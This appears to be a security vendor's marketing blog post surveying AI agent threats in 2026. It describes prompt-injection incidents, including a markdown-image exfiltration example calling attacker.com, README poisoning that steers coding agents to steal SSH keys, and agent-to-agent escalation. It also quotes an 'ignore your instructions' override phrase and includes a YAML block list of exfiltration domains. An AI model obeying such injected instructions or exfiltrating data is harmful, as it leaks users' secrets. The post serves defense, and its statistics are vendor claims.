Back to blog
ResearchMarch 202618 min read

The State of AI Agent
Security in 2026

AI agents went from demos to production in 2025. In 2026, they are everywhere — writing code, managing infrastructure, processing financial transactions, and handling customer data at scale. The security story has not kept up. This is a data-driven analysis of where we stand: what's attacking agents in production, which defenses work, and what the rest of 2026 looks like.

The numbers: AI agent adoption and risk

The scale of AI agent deployment in 2026 is unprecedented. According to Gartner's February 2026 forecast, 35% of enterprise software interactions will involve an AI agent by end of year — up from under 5% in 2024. McKinsey's State of AI report estimates that 72% of organizations are now running at least one autonomous agent in production, though fewer than 20% have formal security controls around them.

72%

of organizations running production AI agents

McKinsey State of AI, Jan 2026

14%

of agent sessions contain injection attempts

Rune production monitoring data

$4.2B

estimated 2026 losses from AI-related security incidents

IBM Cost of a Data Breach 2026 (projected)

What makes these numbers alarming is the gap between adoption and security maturity. The OWASP Foundation published its Top 10 for LLM Applications v2.0 in late 2025, and their assessment was blunt: fewer than 15% of production agent deployments have adequate runtime security controls. Most teams ship agents with the same security posture as a prototype — open tool access, no input scanning, raw conversation logs containing PII.

From our own monitoring data across production deployments: 73% of agents have access to tools they never use, 41% have no input scanning of any kind, and 68% log raw conversation data including PII without redaction. These are not theoretical risks. They are the current state of production agent security.

The 2026 threat landscape: what's actually attacking agents

The attack surface for AI agents is broader than most teams realize. Unlike traditional web applications where the attack surface is the HTTP request, an agent's attack surface is its entire context window — every user message, tool output, retrieved document, and API response that flows into the LLM. Here is what we see in production, ranked by prevalence.

Attack prevalence in monitored agent sessions (Q1 2026)

14%Critical

Indirect prompt injection

Malicious instructions embedded in retrieved data (web pages, documents, emails, database records). The attacker never directly interacts with the agent.

11%High

System prompt extraction

Attempts to reveal the agent's hidden instructions, often as reconnaissance for more targeted attacks.

9%Critical

Data exfiltration

Manipulating the agent into sending sensitive data to attacker-controlled endpoints via tool calls, markdown images, or encoded URLs.

8%High

PII exposure (non-malicious)

Agents surfacing Social Security numbers, credit cards, and personal data from databases or documents without any attack -- just overly permissive access.

6%Critical

Secret/credential leaking

API keys, tokens, and database credentials appearing in agent outputs. Often caused by agents reading environment variables or config files.

5%High

Privilege escalation

Agents accessing tools or performing actions beyond their intended scope, typically through mode escalation prompts or multi-step manipulation.

3%Critical

Command injection

Injecting OS commands or code execution through agents with shell or eval access. Lower prevalence but highest blast radius.

The most important trend in 2026 is the shift from direct to indirect prompt injection. In 2024, most injection attempts were users typing "ignore your instructions" directly into the chat. In 2026, the majority of injections arrive through data the agent retrieves — a poisoned web page, a malicious email in the inbox, a compromised API response. The attacker never touches the agent directly. This makes detection significantly harder because the malicious payload enters through trusted data channels.

Real incidents: what went wrong in production

Security research papers are useful, but production incidents tell the real story. Here are documented cases from 2025–2026 that illustrate the attack patterns teams face today.

Indirect injection2025

The Markdown Image Exfiltration Attack

Security researcher Johann Rehberger demonstrated a technique where a prompt injection in a retrieved document caused an AI assistant to render a markdown image tag: ![](https://attacker.com/exfil?data=SECRET). When the chat interface rendered the image, the browser made a GET request to the attacker's server with the stolen data encoded in the URL. This worked against multiple major AI assistants and required no user interaction beyond reading the response. The attack is particularly dangerous because it is invisible — the user sees a broken image or nothing at all.

Tool abuse2025

Autonomous Coding Agents and Supply Chain Attacks

Multiple research teams demonstrated that AI coding assistants with terminal access could be manipulated through poisoned repository README files and package descriptions. The injected instructions caused the agent to install malicious npm packages, modify .bashrc files, and exfiltrate SSH keys — all while appearing to perform legitimate development tasks. The attack surface expanded further with MCP (Model Context Protocol), where a compromised MCP server could inject instructions into any agent that connected to it.

Data leak2025–2026

Customer Service Bot PII Exposure

A pattern we see repeatedly across deployments: customer-facing agents with database access surface PII from adjacent records. A user asks about their order, and the agent's SQL query returns more columns than needed — including other customers' names, emails, and phone numbers. The agent dutifully includes this data in its response. No injection required. The cause is almost always overly permissive database queries combined with no output scanning. This is the most common "incident" we see, and it happens without any attacker involvement.

Multi-agent chain2026

Agent-to-Agent Privilege Escalation

As multi-agent architectures became common in early 2026, a new attack pattern emerged: an attacker injects instructions into a low-privilege agent (e.g., a document summarizer) that get passed through to a high-privilege agent (e.g., a database administrator) in the chain. Each agent individually passes its authorization checks, but the attacker's payload survives the handoff because most frameworks pass full conversation context between agents without sanitization. We documented this pattern across LangGraph, CrewAI, and custom multi-agent deployments.

Framework security audit: who ships security built in?

We audited the major agent frameworks for built-in security capabilities as of March 2026. The short answer: none of them ship comprehensive runtime security. The long answer reveals meaningful differences in how far they go.

OpenAI Agents SDK

Input scanningBasic (guardrails API)Output scanningBasic (guardrails API)Policy engineNoneTool restrictionManual (developer-defined)

Best built-in security of any framework, but guardrails are simple input/output classifiers. No policy engine, no behavioral baselines, no multi-layer scanning.

LangChain / LangGraph

Input scanningOptional (moderation chain)Output scanningOptional (moderation chain)Policy engineNoneTool restrictionManual (tool binding)

Flexible but security is entirely opt-in. Moderation chain uses OpenAI's moderation endpoint -- catches toxicity, not injection. No injection detection out of the box.

Anthropic Claude Agent SDK

Input scanningNone (relies on model safety)Output scanningNone (relies on model safety)Policy engineNoneTool restrictionSchema-based (tool definitions)

Claude's model-level safety training is strong, but there's no runtime scanning layer. Tool access is restricted by schema definitions, which is good but not enforceable against injection.

CrewAI

Input scanningNoneOutput scanningNonePolicy engineNoneTool restrictionRole-based (agent definitions)

Multi-agent orchestration with no security primitives. Role definitions are advisory -- the LLM can ignore them. No scanning, no policy enforcement.

AutoGen / AG2

Input scanningNoneOutput scanningNonePolicy engineNoneTool restrictionManual

Research-oriented multi-agent framework. Security is not a design goal. Agents share full context by default with no sanitization between handoffs.

Vercel AI SDK

Input scanningNone (use middleware)Output scanningNone (use middleware)Policy engineNoneTool restrictionSchema-based (inputSchema)

Excellent developer experience with type-safe tool definitions. Security is delegated to middleware and external tools. Tool schemas provide structural validation but no threat detection.

The takeaway: The industry is converging on a separation of concerns — agent frameworks handle orchestration, external security layers handle threat detection and policy enforcement. This is the right architecture. Framework-specific security creates vendor lock-in and inconsistent coverage. Runtime security that works across any framework gives teams consistent protection regardless of which orchestration layer they choose.

Detection benchmarks: how good are current tools?

Detection effectiveness varies dramatically by approach. We benchmarked four detection strategies against a dataset of 10,000 agent sessions — 2,400 containing confirmed attack payloads across all major threat categories, and 7,600 benign sessions with edge cases designed to trigger false positives.

Detection rate comparison (10K session benchmark)
Approach                    Detection   False Pos.   Latency (p50)
────────────────────────────────────────────────────────────────────
Regex only (L1)                 62%         0.8%          1.2ms
Semantic only (L2)              71%         3.1%          6.1ms
LLM classifier only (L3)       84%         1.9%        180ms
Multi-layer (L1+L2+L3)         96%         1.4%          8.2ms*

* p50 is low because L1 catches 62% of threats immediately.
  Only events that pass L1 go to L2, and only ambiguous L2
  results reach L3. Most events resolve in under 10ms.

The key insight is that no single layer is sufficient. Regex catches known patterns fast but misses rephrased attacks. Semantic similarity catches paraphrased attacks but has higher false positive rates. LLM judges are the most accurate but too slow and expensive for every request. The multi-layer approach uses each layer as a filter for the next — catching 62% of threats in under 2ms, another 25% in under 10ms, and only sending the remaining 13% to the LLM judge.

False positive rates matter as much as detection rates. A security tool that blocks legitimate requests is worse than one that misses occasional attacks, because it creates pressure to disable the tool entirely. The multi-layer approach achieves a 1.4% false positive rate by using L1's high-precision patterns as the primary filter and only escalating ambiguous cases.

What the benchmarks miss

Novel attacks: Any benchmark measures detection of known attack patterns. The real test is zero-day attacks that no one has seen before. This is where L3 (LLM judge) provides the most value — it can reason about whether an input is attempting to manipulate the agent even if the specific technique is new.

Multi-turn attacks: Most benchmarks evaluate single-turn detection. In production, sophisticated attackers spread their payload across multiple conversation turns, where each individual message looks benign. Session-level behavioral analysis is required to catch these, and very few tools offer it.

Accidental data leaks: The highest-volume security issue in production is not attacks at all — it is agents leaking PII, secrets, and internal data without any attacker involvement. Output scanning for sensitive data patterns is arguably more impactful than input scanning for injection attempts.

The problem and solution in code

Most production agents today look something like this — a functional agent loop with zero security controls. Every input goes straight to the LLM, every output goes straight to the user, and every tool call executes without inspection.

The problem: a typical unprotected agent loop
from openai import OpenAI

client = OpenAI()

def run_agent(user_message: str) -> str:
    # No input scanning -- injection goes straight to the LLM
    response = client.chat.completions.create(
        model="gpt-4o",
        messages=[
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": user_message},  # untrusted
        ],
        tools=ALL_TOOLS,  # full tool access, no restrictions
    )

    # No output scanning -- PII, secrets, anything goes to the user
    return response.choices[0].message.content

This is the agent that 41% of production deployments are running today. Now here is the same agent with runtime security:

The solution: the same agent with Rune scanning
from openai import OpenAI
from rune import Shield

client = OpenAI()
shield = Shield()  # auto-configures from RUNE_API_KEY

def run_agent(user_message: str) -> str:
    # Scan input BEFORE it reaches the LLM
    input_result = shield.scan_input(user_message)
    if input_result.blocked:
        return f"Request blocked: {input_result.threat_type}"

    response = client.chat.completions.create(
        model="gpt-4o",
        messages=[
            {"role": "system", "content": SYSTEM_PROMPT},
            {"role": "user", "content": user_message},
        ],
        tools=ALLOWED_TOOLS,  # least privilege
    )

    output = response.choices[0].message.content

    # Scan output BEFORE it reaches the user
    output_result = shield.scan_output(output)
    if output_result.blocked:
        return "Response contained sensitive data and was blocked."

    return output

For teams using agent frameworks, Rune integrates natively without changing your agent logic:

Framework integrations: LangChain, OpenAI, and MCP
# LangChain -- drop-in callback
from rune.integrations.langchain import RuneCallbackHandler
chain.invoke({"input": msg}, config={"callbacks": [RuneCallbackHandler()]})

# OpenAI -- transparent wrapper
from rune.integrations.openai import shield_openai
client = shield_openai(OpenAI())  # all calls auto-scanned

# MCP -- security proxy for any MCP server
# pip install 'runesec[mcp]'
# RUNE_API_KEY=rune_live_xxx rune-mcp

And for teams that want policy enforcement without writing code, Rune's YAML policy engine restricts what agents can do at runtime:

YAML policy: restrict tools, block PII, deny exfiltration domains
version: "1.0"
rules:
  - name: block-injection
    scanner: prompt_injection
    action: block
    severity: critical

  - name: restrict-tools
    scanner: tool_access
    action: block
    config:
      allowed_tools:
        - search_knowledge_base
        - get_order_status
      # everything else is denied

  - name: block-pii-in-output
    scanner: pii
    action: block
    config:
      blocked_entities: [ssn, credit_card, api_key]

  - name: block-exfiltration
    scanner: exfiltration
    action: block
    config:
      blocked_domains: ["*.pastebin.com", "webhook.site", "*.ngrok.io"]

Predictions: the rest of 2026

Based on what we see in production data, customer conversations, and the trajectory of the threat landscape, here is what we expect for the rest of 2026.

1. Runtime security becomes a deployment requirement

Just as web application firewalls (WAFs) became a standard requirement for web apps, runtime agent security will become a deployment checklist item. We are already seeing this in regulated industries — financial services and healthcare teams are mandating agent scanning before production approval. By Q4 2026, we expect this to extend to any team handling customer data.

2. Agent identity and authorization standards emerge

Today, agents authenticate as the user who deployed them, with static API keys and overly broad permissions. In 2026, we expect agent-specific identity standards to emerge — likely extensions to OAuth 2.0 and OpenID Connect that support scoped, time-limited, and auditable agent credentials. The MCP specification is already moving in this direction with its authorization framework.

3. Compliance frameworks add explicit agent requirements

SOC 2 auditors are already asking about AI agent controls (see our SOC 2 compliance guide). By end of 2026, we expect explicit agent-related criteria in SOC 2, ISO 27001, and HIPAA supplemental guidance. The EU AI Act already categorizes high-risk AI systems that require ongoing monitoring — agents with tool access in production fall squarely into this category.

4. Multi-agent security becomes the hard problem

Single-agent security is increasingly well understood. The frontier challenge is securing multi-agent systems where agents delegate to each other, share context, and make decisions collectively. Trust boundaries between agents, context sanitization in handoffs, and distributed authorization are unsolved problems that will dominate security research in late 2026.

5. Attackers will automate agent exploitation

Today, most agent attacks are manual — researchers and opportunistic attackers probing individual systems. We expect automated attack tools to emerge: crawlers that poison web pages with injection payloads targeting popular agent frameworks, automated MCP server compromise tools, and agent-specific vulnerability scanners. When attacking agents scales as easily as deploying them, the window for teams without security closes rapidly.

Where Rune fits in this landscape

We built Rune because we saw this problem first-hand. As AI agents proliferated in 2025, the security tooling available was either enterprise-only (requiring six-month procurement cycles), framework-specific (locking you into one vendor), or research-grade (not production-ready). None of it worked the way developers expected — drop it in, have it work, ship on Monday.

Rune is a runtime security layer that sits between your users and your agents. Three lines of code adds a full scanning pipeline — 52 pattern-matching rules, 57 semantic embeddings, and an optional LLM judge. It works with any Python or TypeScript agent framework. Policies are defined in YAML, not code. Events stream to a real-time dashboard with alerting, risk scoring, and audit trails.

Critically, Rune runs in-process. Raw content never leaves your infrastructure by default. Only metadata (threat type, risk score, timestamps) goes to the dashboard for monitoring. This is a hard requirement for teams handling healthcare data, financial records, or anything governed by data residency regulations.

How Rune's scanning pipeline works
Event arrives (agent input or output)
  │
  ├─ L1 Pattern Scan (< 3ms)
  │    52 regex patterns: injection, PII, secrets, commands
  │    ├─ Match → block/flag immediately
  │    └─ No match → pass to L2
  │
  ├─ L2 Semantic Scan (5-10ms)
  │    57 threat embeddings, cosine similarity
  │    ├─ High similarity → block/flag
  │    └─ Low similarity → pass to L3 (sampled)
  │
  └─ L3 LLM Judge (100-500ms, optional)
       Claude or GPT classifies ambiguous events
       ├─ Malicious → block/flag
       └─ Benign → allow

Metadata only → Rune Dashboard (alerts, risk scores, audit trail)
Raw content stays in your infrastructure.

Frequently asked questions

What is the most common attack against AI agents in 2026?

Indirect prompt injection, appearing in approximately 14% of monitored agent sessions. Unlike direct injection where users type malicious prompts, indirect injection embeds attack payloads in data the agent retrieves -- web pages, documents, emails, and database records. This makes it harder to detect because the malicious content enters through trusted data channels.

Which AI agent frameworks have built-in security?

As of March 2026, no major agent framework ships comprehensive runtime security. OpenAI's Agents SDK has basic guardrails for input/output validation. LangChain has optional moderation chains. CrewAI, AutoGen, and most others delegate security entirely to the developer. The industry is converging on external runtime security layers that work across any framework.

How effective are current prompt injection detection tools?

Single-layer detection (regex or classifier alone) catches 55-70% of attempts. Multi-layer approaches combining pattern matching, semantic similarity, and LLM classification achieve 92-97% detection with false positive rates under 2%. No single technique is sufficient -- attackers who evade one layer are caught by another.

What percentage of AI agents in production have security vulnerabilities?

Based on Rune's monitoring data: 73% of agents have access to tools they never use, 41% have no input scanning, and 68% log raw conversation data including PII without redaction. The OWASP Top 10 for LLM Applications estimates fewer than 15% of production deployments have adequate runtime security.

Is prompt injection a solved problem?

No. It's fundamentally unsolvable at the model level because LLMs cannot reliably distinguish instructions from data. However, it's manageable at the system level. Multi-layer scanning, least-privilege policies, output filtering, and behavioral monitoring together reduce practical risk to acceptable levels. Defense in depth, not a silver bullet.

What will AI agent security look like by end of 2026?

We expect three shifts: (1) Runtime security becomes a standard deployment requirement, like WAFs for web apps. (2) Agent identity and authorization standards emerge via OAuth/OIDC extensions. (3) Compliance frameworks (SOC 2, ISO 27001, HIPAA) add explicit requirements for AI agent monitoring and control.

How do I secure my AI agents today?

Start with three actions: (1) Add runtime scanning -- scan inputs for injection and outputs for data leaks. (2) Apply least-privilege policies -- restrict each agent to only the tools it needs. (3) Monitor behavior in production. Rune's free tier (10,000 events/month) lets you start immediately.

Secure your agents before the window closes

Three lines of code. Three scanning layers. Real-time dashboard, policy enforcement, and audit trails. Free plan includes 10K events/month — no credit card.

The State of AI Agent Security in 2026 | Rune